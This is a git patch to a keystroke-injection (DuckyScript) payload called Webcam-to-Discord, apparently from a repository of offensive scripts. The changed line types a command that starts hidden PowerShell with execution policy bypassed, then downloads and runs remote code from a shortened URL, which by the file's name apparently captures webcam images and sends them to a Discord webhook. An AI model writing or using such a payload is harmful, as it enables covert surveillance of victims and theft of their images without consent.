From 8a76bde7854d7483b5572788e9bdce61af375740 Mon Sep 17 00:00:00 2001 From: egieb <93350544+beigeworm@users.noreply.github.com> Date: Thu, 11 Apr 2024 21:40:40 +0000 Subject: [PATCH] Update Webcam-to-Discord.txt --- Webcam-to-Discord/Webcam-to-Discord.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Webcam-to-Discord/Webcam-to-Discord.txt b/Webcam-to-Discord/Webcam-to-Discord.txt index 33d7e67..e64014d 100644 --- a/Webcam-to-Discord/Webcam-to-Discord.txt +++ b/Webcam-to-Discord/Webcam-to-Discord.txt @@ -12,7 +12,7 @@ REM open powershell (remove "-W H" to show the window) DELAY 1000 GUI r DELAY 750 -STRING powershell -NoP -Ep Bypass -W H -C $dc = 'YOUR_WEBHOOK_HERE' ; irm URL | iex +STRING powershell -NoP -Ep Bypass -W H -C $dc = 'YOUR_WEBHOOK_HERE' ; irm is.gd/bwcamtodc | iex ENTER